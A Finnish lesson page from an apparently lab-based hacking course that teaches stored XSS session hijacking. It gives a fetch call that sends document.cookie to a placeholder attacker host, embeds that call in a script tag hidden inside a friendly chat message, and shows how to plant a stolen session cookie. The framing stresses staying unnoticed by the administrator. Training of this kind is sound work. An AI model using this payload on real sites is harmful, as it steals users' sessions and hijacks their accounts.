Tässä moduulissa hyväksikäytämme harjoituskohteessa olevaa XSS-haavoittuvuutta, joten voit käynnistää alla olevan tehtävän ja toistaa vaiheet omassa tahdissa.

Tämä moduuli vaatii salamyhkäisyyttä! Jos järjestelmänvalvoja huomaa poikkeuksellista toimintaa, saattaa hän sammuttaa järjestelmän.

Varasta järjestelmänvalvojan istuntoevästeet ja autentikoidu järjestelmään kyseisenä käyttäjänä.

Tässä moduulissa käytät hyväksi XSS haavoittuvuutta ja kaappaat järjestelmänvalvojan istunnon. 

XSS 2


Tällä kertaa järjestelmänvalvoja huomaa, jos käyttäjät alkavat lähettämään tahattomia viestejä, kokeile vaikka! Tässä tehtävässä turvaudumme siis vaihtoehtoiseen vuodatuskanavaan, eli lähetämme evästeen salaa HTTP-kuuntelijaan, jonka olemme käynnistäneet hyökkääjän palvelimella. Näin evästeet eivät näy sivustolla vaan siirtyvät huomaamatta hyökkääjälle.

Tarvitsemme ensin kuuntelijan, jonne evästeet voidaan lähettää. Onneksi, hyökkääjän koneella on jo käynnissä HTTP-palvelin portissa 80. 

URL-osoite on lueteltu hyökkääjän resurssien alla (alkaa https://web-).

-komentoa seurataksesi kuuntelijaan tulleita HTTP-pyyntöjä.

Seuraavaksi kirjoitamme haittakoodin, joka suoritettuna lähettää evästeet kuuntelijaamme. Aloitetaan avaamalla taas selaimen kehittäjätyökalut ja kirjoitellaan sekä testataan hyökkäyskoodi JavaScript-konsolissa. Käytetään tässäkin tapauksessa 

Ideana on tehdä HTTP-pyyntö hyökkääjän kuuntelijaan, ja sisällyttää pyynnön URL-osoitteeseen istuntoeväste, joka halutaan varastaa. 

Älä välitä virheistä, joita saatat nähdä suorittaessasi haittakoodin.



Kun haittakoodimme on toimintavalmis, pitäisi kuuntelijaan saapua HTTP-pyyntö, joka sisältää käyttäjämme istuntoevästeen.

Kun olemme todenneet haittakoodin toimivuuden, asetamme tämän 

-elementin sisään ja ujutamme haavoittuvaiselle sivulle uudessa viestissä.

Lopuksi odotamme, että järjestelmänvalvoja lukee viestimme, jonka johdosta haittakoodimme suoritetaan ja järjestelmänvalvojan evästeet siirtyvät kuuntelijaamme. 

Järjestelmänvalvojan istuntotunnisteen käyttäminen

Muistutuksena vielä, näin asetat järjestelmänvalvojan evästeen selaimeesi:

Sitten vain päivitämme sivun, ja voilà!

*Tässä moduulissa hyväksikäytämme harjoituskohteessa olevaa XSS-haavoittuvuutta, joten voit käynnistää alla olevan tehtävän ja toistaa vaiheet omassa tahdissa.*

@exercise e4ac4ef2c42d

Tällä kertaa järjestelmänvalvoja huomaa, jos käyttäjät alkavat lähettämään tahattomia viestejä, kokeile vaikka! Tässä tehtävässä turvaudumme siis vaihtoehtoiseen vuodatuskanavaan, eli lähetämme evästeen salaa HTTP-kuuntelijaan, jonka olemme käynnistäneet hyökkääjän palvelimella. Näin evästeet eivät näy sivustolla vaan siirtyvät huomaamatta hyökkääjälle.

## Kuuntelija

Tarvitsemme ensin kuuntelijan, jonne evästeet voidaan lähettää. Onneksi, hyökkääjän koneella on jo käynnissä HTTP-palvelin portissa 80. *URL-osoite on lueteltu hyökkääjän resurssien alla (alkaa https://web-).*

Avaa hyökkääjän pääte ja käytä **tail**-komentoa seurataksesi kuuntelijaan tulleita HTTP-pyyntöjä.

```sh
tail -f /var/log/apache2/access.log
```

---

## Hyökkäyskoodi

Seuraavaksi kirjoitamme haittakoodin, joka suoritettuna lähettää evästeet kuuntelijaamme. Aloitetaan avaamalla taas selaimen kehittäjätyökalut ja kirjoitellaan sekä testataan hyökkäyskoodi JavaScript-konsolissa. Käytetään tässäkin tapauksessa **fetch-**funktiota evästeen lähettämiseen.

```javascript
fetch("https://web-attacker-.../" + document.cookie);
```

Ideana on tehdä HTTP-pyyntö hyökkääjän kuuntelijaan, ja sisällyttää pyynnön URL-osoitteeseen istuntoeväste, joka halutaan varastaa. *Älä välitä virheistä, joita saatat nähdä suorittaessasi haittakoodin.*

Kun haittakoodimme on toimintavalmis, pitäisi kuuntelijaan saapua HTTP-pyyntö, joka sisältää käyttäjämme istuntoevästeen.

![](sanity:image-4a3ae57d85e5d4aabdc0a6e358b47ac3cd638320-829x155-png)

---

## Hyökkäys

Kun olemme todenneet haittakoodin toimivuuden, asetamme tämän **script**-elementin sisään ja ujutamme haavoittuvaiselle sivulle uudessa viestissä.

```html
Moi! Mitä kuuluu? <script>fetch("https://web-attacker-.../" + document.cookie);</script>
```

Lopuksi odotamme, että järjestelmänvalvoja lukee viestimme, jonka johdosta haittakoodimme suoritetaan ja järjestelmänvalvojan evästeet siirtyvät kuuntelijaamme. 

---

## Järjestelmänvalvojan istuntotunnisteen käyttäminen

Muistutuksena vielä, näin asetat järjestelmänvalvojan evästeen selaimeesi:

```javascript
document.cookie = "SessionId=.eJ...";
```

Sitten vain päivitämme sivun, ja voilà!


Evästeiden vuodatus verkon yli

Opi löytämään ja hyväksikäyttämään haavoittuvuutta joka on yksi kaikista yleisimmistä haavoittuvuuksista, helpohko löytää, ja siitä huolimatta hyvin vaarallinen. Hackerone rankkasi XSS:n #1 bug bounty -haavoittuvuudeksi 2021.

XSS (Cross-Site Scripting) haavoittuvuudet ovat sekä yleisiä että vakavia. Esimerkiksi HackerOne on listannut XSS:n ensimmäiseksi top 10 haavoittuvuudet listallaan.

Haavoittuvuuden läpikohtainen hallitseminen on siis erittäin tärkeää, olit sitten murtotestaaja, tietoturvakonsultti, kehittäjä tai bounty hunteri!

Evästeiden vuodatus verkon yli

Kuuntelija

Hakkeroinnin oppiminen alkaa tästä